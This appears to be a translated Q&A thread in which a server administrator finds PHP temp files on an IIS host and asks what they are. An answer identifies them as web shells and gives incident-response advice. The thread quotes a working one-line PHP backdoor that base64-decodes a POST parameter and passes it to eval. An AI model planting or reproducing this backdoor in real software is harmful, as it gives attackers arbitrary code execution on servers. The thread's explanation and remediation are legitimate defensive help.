我注意到我们的temp目录中有许多看起来像phpA3F9.tmp之类的临时文件
查看目录,我发现一个数字,后跟一些PHP代码,以下代码出现在几个文件中
9990000
<?php
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
这似乎是攻击尝试,但我认为它依赖于攻击者能够执行tmp文件夹中的代码。
有人可以解释这是怎么回事吗?有什么风险?这些文件如何进入tmp文件夹?我该如何阻止他们?
我不知道它是否相关,但我们正在IIS上运行PHP 5.5
这些是PHP外壳程序,它们所在的位置几乎无害,但是如果它们进入您的Web根目录,它们将允许攻击者在您的服务器上执行任何任意代码。
了解外壳的关键部分是:
$xsser=base64_decode($_POST['z0']);
@eval("\$safedg = $xsser;");
[它完全接受$_POST变量中的任何代码,将其base64_decode接受,然后通过eval运行它,同时抑制任何错误。[有可能通过您网站上的表单将它们上传,并作为中间步骤将其转储到temp文件夹中,希望将它们转移到可通过Web访问的位置。另一个选择是您的服务器上已经有一个Shell或rootkit,并将这些文件放在它可以找到的任何可写文件夹中。
那么该怎么办?检查服务器日志-如果发现无法识别的脚本成功连接,则可能会受到威胁。在您的网站上查找任何上传表单,并将其锁定(需要用户身份验证等),然后,如果您确定自己已受到危害,请不要打扰清理它。启动新服务器,将
clean
代码,重要文件和数据迁移到干净服务器。